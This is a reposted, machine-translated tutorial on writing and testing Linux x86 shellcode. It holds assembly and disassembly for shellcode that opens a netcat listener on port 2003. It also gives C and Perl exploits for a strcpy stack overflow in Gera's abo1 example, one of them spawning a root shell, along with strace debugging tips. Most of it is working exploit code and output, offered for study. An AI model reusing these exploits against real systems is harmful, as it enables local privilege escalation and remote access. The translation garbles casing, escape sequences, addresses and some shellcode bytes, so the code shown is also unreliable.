[Practice] exploit and shellcode experience and skills

Source: Internet
Author: User
Exploit and shellcode experience and skills

Created on:
Article attributes: original
Article submission: oyxin (oyxin_at_ph4nt0m.net)

Oyxin
OYXin@ph4nt0m.net

Exploit and shellcode experience and skills

This article does not teach you how to write exploit and shellcode, but hopes to provide some experiences and skills about writing or researching exploit and shellcode. It is suitable for anyone who understands how shellcode is written. I have read a lot of related articles, and most of the writing methods are similar to those in Aleph one's "smashing the stack for fun and profit. The writing shellcode article written by zillion of safemode.org is particularly attractive to me. I think it is very convenient for him to provide a method. I combined my tests to link up some of the skills in the article. There are also some problems and solutions you encounter when learning exploit. I hope that I can help my friends who are just new to exploit. The level is limited and errors are inevitable. Please contact me if you find any errors. Thank you very much.

If we don't fight unprepared battles, we 'd better make some preparations first. Refer to my system environment.
System Environment: RedHat 9.0, GCC version 3.2.2, NASM version 0.98.35, Perl 5.8.0

Let's get down to it. Write the functions of the program we want to execute in assembly language. The process is similar to the common shellcode ASM writing method. Here I will not use/bin/sh as an example. I want to write a shellcode that enables NC listening to a port. The purpose of the test is not to bind shell. First, VIM ncshellcode. s and fill in the following code:

Bits 32

JMP short Calender

Doit:

Pop ESI
XOR eax, eax
MoV byte [ESI + 7], Al; add 0 after/usr/NC
MoV byte [ESI + 10], Al; add 0 after-l
MoV byte [ESI + 13], Al; add 0 after-P
MoV byte [ESI + 18], Al; add 0 after 2003
MoV long [ESI + 19], ESI; place the string/usr/NC address in the location where AAAA is located
Lea EBX, [ESI + 8]; returns the string-l address.
MoV long [ESI + 23], EBX; place the string-l address in BBBB
Lea EBX, [ESI + 11]; returns the string-P address.
MoV long [ESI + 27], EBX; place the string-P address in CCCC
Lea EBX, [ESI + 14]; returns the address of string 2003.
MoV long [ESI + 31], EBX: put the address of string 2003 in dddd
MoV long [ESI + 35], eax; put null in eeee
MoV byte Al, 0x0b; syscall 0x0b (execve)
MoV EBX, ESI; program
Lea ECx, [ESI + 19]; (/usr/NC-l-P 2002)
Lea edX, [ESI + 35]; null
Int 0x80;

Calender:
Call doit

Db'/usr/NC #-L #-P #2003 # aaaabbbbccccddddeeee'

The idea is actually the same as that of Aleph one. Note that the syntax of NASM is intel. Note: db'/usr/NC #-L #-P #2003 # aaaabbbbccccddddeeee ', and fill # With a byte of 0. AAAA, BBBB, CCCC .... it is used to store the address of the string address, which can avoid errors caused by carelessness, such as improper calculation of the number of bytes.
After writing the source code, use NASM-O ncshellcode. s to compile it. After compilation, you can use ndisasm to get shellcode.
[Oyxin @ oyxin shellcode] $ ndisasm-B 32 ncshellcode
00000000 eb33 JMP short 0x35
00000002 5E pop ESI
00000003 31c0 XOR eax, eax
00000005 884607 mov [ESI + 0x7], Al
00000008 88460a mov [ESI + 0xa], Al
10000000b 88460d mov [ESI + 0xd], Al
0000000e 884612 mov [ESI + 0x12], Al
00000011 897613 mov [ESI + 0x13], ESI
00000014 8d5e08 Lea EBX, [ESI + 0x8]
00000017 895e17 mov [ESI + 0x17], EBX
10000001a 8d5e0b Lea EBX, [ESI + 0xb]
2017001d 895e1b mov [ESI + 0x1b], EBX
00000020 8d5e0e Lea EBX, [ESI + 0xe]
00000023 895e1f mov [ESI + 0x1f], EBX
00000026 894623 mov [ESI + 0x23], eax
00000029 b00b mov Al, 0xb
2017002b 89f3 mov EBX, ESI
2017002d 8d4e13 Lea ECx, [ESI + 0x13]
00000030 8d5623 Lea edX, [ESI + 0x23]
00000033 CD80 int 0x80
00000035 e8c8ffffff call 0x2
0000003a 2f Das
10000003b 7573 jnz 0xb0
0000003d 722f JC 0x6e
0000003f 6e outsb
00000040 6323 arpl [EBX], SP
00000042 2d6c232d70 sub eax, 0x702d236c
00000047 2332 and ESI, [edX]
00000049 3030 XOR [eax], DH
2017004b 3323 xor esp, [EBX]
2017004d 41 Inc ECx
2017004e 41 Inc ECx
2017004f 41 Inc ECx
00000050 41 Inc ECx
00000051 42 Inc edX
00000052 42 Inc edX
00000053 42 Inc edX
00000054 42 Inc edX
00000055 43 Inc EBX
00000056 43 Inc EBX
00000057 43 Inc EBX
00000058 43 Inc EBX
00000059 44 Inc ESP
2017005a 44 Inc ESP
2017005b 44 Inc ESP
2017005c 44 Inc ESP
2017005d 45 Inc EBP
2017005e 45 Inc EBP
2017005f 45 Inc EBP
00000060 45 Inc EBP

In fact, it is so simple. The rest is to test whether the shellcode can run normally. Here I will use an example in the non-security advanced buffer overflow to test. (Of course, this assembly code can be further optimized)

/* Abo1.c *
* Specially crafted to feed your brain by gera@core-sdi.com */
/* Dumb example to let you get introduced & iexcl; & shy ;*/
Int main (INT argv, char ** argc)
{
Char Buf [256];
Strcpy (BUF, argc [1]);
}

The above code is a vulnerability program. below is the exploit I wrote. The long shellcode is the shellcode of NC-l-P 2003.

# Exp2.c
# Codz by oyxin
# Include <stdio. h>
# Include <stdlib. h>
# Include <unistd. h>
# Define bufsize 272
Char shellcode [] =
"/Xeb/x33/x5e/x31/xc0/x88/X46/x07/x88/X46/x0a/x88/X46/x0d/x88"
"/X46/X12/x89/x76/x13/x8d/x5e/x08/x89/x5e/x17/x8d/x5e/x0b/x89"
"/X5e/x1b/x8d/x5e/x0e/x89/x5e/x1f/x89/X46/x23/xb0/x0b/x89/xf3"
"/X8d/x4e/x13/x8d/x56/x23/XCD/X80/xe8/xc8/xFF/x2f/x75"
"/X73/x72/x2f/x6e/x63/x23/x2d/x6c/x23/x2d/375/x23/x32/x30/x30"
"/X33/x23/x41/x41/x41/x41/x42/x42/x42/x42/x43/x43/x43/x43/x44"
"/X44/x44/x44/x45/x45/x45/x45 ";

Int main (INT argc, char * argv []) {
Char Buf [bufsize + 1];
Char * prog [] = {"./abo1", Buf, null };
Char * env [] = {"home =/root", shellcode, null };
Unsigned long ret;
Ret = 0xc0000000-sizeof (void *)-strlen (Prog [0])-strlen (shellcode)-0x02;
Memset (BUF, 0x90, bufsize );
Memcpy (& Buf [bufsize-(sizeof (RET)], & ret, sizeof (RET ));
Memcpy (& Buf [bufsize-(2 * sizeof (RET)], & ret, sizeof (RET ));
Memcpy (& Buf [bufsize-(3 * sizeof (RET)], & ret, sizeof (RET ));
Memcpy (& Buf [bufsize-(4 * sizeof (RET)], & ret, sizeof (RET ));
Buf [bufsize] = '/0 ';
Execve (Prog [0], prog, ENV );
Return 0;
}
Here is the output.
[Oyxin @ oyxin Buf] $./exp2
Ls # Here is the output from the server after the client inputs
Yeah! Lol ....

[Oyxin @ oyxin] $ nc-VV localhost 2003
Oyxin [127.0.0.1] 2003 (cfinger) Open
Ls # client input
Yeah! Lol ....

After running exp2, the port 2003 is successfully opened and the shellcode is successful.
By the way, I saw the cute thorn in the Green League asked the shellcode address calculation question (using the environment variable ), this section describes the non-secure advanced Buffer Overflow programming for writing exploit netric and Gera using environment variables.
Gera calculation method: ret = 0xbffffffa-strlen (name_of_program)-strlen (shellcode )"
Netric calculation method: ret = 0xc0000000-sizeof (void *)-strlen (Prog [0])-strlen (Shell)-0x02;
Note: "Here we find that the pin P in the linux_binprm structure is set to point to the last memory page and subtract a void pointer, like 0xc0000000-0x04 ", calculate the netric ret = 0xc0000000-0x04-0x02-strlen (Prog [0])-strlen (Shell) = 0xbffffffa-strlen (Prog [0]-strlen (Shell ), because strlen (Prog [0] Is strlen (name_of_progarm), the two formulas are identical. There is no difference. For details about the principles, refer to the unsecure advanced buffer overflow of the translation and the netric article I have translated.
Although Perl does not have the execve () function, it can easily and easily write the exploit using environment variables.
The following is the exploit for abo1 written in Perl.

#! /Usr/bin/perl
# Code by oyxin
$ Shellcode =
"/X31/xc0/x31/XDB/xb0/x17/XCD/X80 ".
"/X31/XDB/x89/xd8/xb0/x2e/XCD/X80 ".
"/X31/xd2/X52/x68/x6e/x2f/x73/x68/x68/x2f/x2f/x62/x69 ".
"/X89/xe3/X52/x53/x89/xe1/x8d/x42/x0b/XCD/X80 ";
$ Path = "./abo1 ";
$ Ret = 0 xbffffffa-length ($ shellcode)-length ($ PATH); # Here is the formula, as mentioned above.
$ New_ret = pack ('l', $ RET );
$ Buffer = "A" x 268;
$ Buffer. = $ new_ret;
Local ($ ENV {'oyxin'}) = $ shellcode;
Exec ("$ PATH $ buffer ");

Is it easy to write with Perl? Hey hey.

Let's get back to the topic: P
At that time, I made a mistake when debugging the program. My NC is in the/usr/bin/directory instead of the/usr directory. The strace tool can be used for debugging.
Strace./exp2 can see the following prompt.
Execve ("/usr/NC", ["/usr/NC", "-l", "-P", "2003"], [/* 0 vars */]) =-1 enoent (no such file or direc or directory)
Now we know that the/usr directory does not have NC. Copy the NC to the/usr directory and continue strace./exp2.
The last line of output is
Accept (3,

Hey, the listener is successful. Open another xterm and connect it with NC. You can see it in the screen output that previously run strace.
Accept (3, {sa_family = af_inet, sin_port = htons (32886), sin_addr = inet_addr ("127.0.0.1")}, [16]) = 4
Rt_sigaction (sigalrm, {sig_ign}, {sig_ign}, 8) = 0
Alarm (0) = 0
Close (3) = 0
Getsockname (4, {sa_family = af_inet, sin_port = htons (2003), sin_addr = inet_addr ("127.0.0.1")}, [16]) = 0
Select (16, [0 4], null, null, NUL

Input ls on the client, and the output is
Select (16, [0 4], null, null) = 1 (in [4])
Read (4, "ls/N", 8192) = 3
Write (1, "ls/N", 3ls
) = 3
Select (16, [0 4], null, null, NUL

Strace is a very useful tool when testing shellcode. You can quickly understand the error. To make further modifications.

I remember seeing a friend in the security focus once asked me how to know the real actions like/xeb/x33/Dongdong. When you suspect that an exploit is essentially a trojan program. When someone else writes shellcode that is short and lean, you want to study it. It is really important to study shellcode. Here is also a very simple method. The following script easily writes shellcode to a binfile. You only need to modify the $ shellcode variable and run the script to get a shellcode. binfile, the rest is to use ndisasm or Windows w32dasm for analysis.

The following example shows how to analyze the shellcode of 24bytes:
#! /Usr/bin/perl-W
$ Shellcode = "/x31/xc0/x50/x68/x2f/x2f/x73/x68/x68/x2f/x62/x69 ". "/x6e/x89/xe3/x50/x53/x89/xe1/x99/xb0/x0b/XCD/X80 ";
Open (file, "> shellcode. bin ");
Print file "$ shellcode ";
Close (File );
Run it to get shellcode. bin, and then analyze it with ndisasm.

[Oyxin @ oyxin] $ ndisasm-B 32 shellcode. Bin
00000000 31c0 XOR eax, eax
00000002 50 push eax
00000003 682f2f7368 push DWORD 0x68732f2f # Push // sh
00000008 682f62696e push DWORD 0x6e69622f # Push/bin
000d 89e3 mov EBX, esp # pass the string address to EBX
0000000f 50 push eax
00000010 53 push EBX
00000011 89e1 mov ECx, esp # pass the string address to ECx
00000013 99 CDQ
00000014 b00b mov Al, 0xb
00000016 CD80 int 0x80

The idea of writing 24 bytes shellcode is basically known. Like the analysis by our predecessors, it is also possible to call without exit. The stack and ESP transfer addresses are used, and traditional methods such as jump ESI are not used.
Recently, I 've been watching Gera's non-secure and advanced buffer overflow. The following examples are not available in Perl. I hope some experienced users can talk to me.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.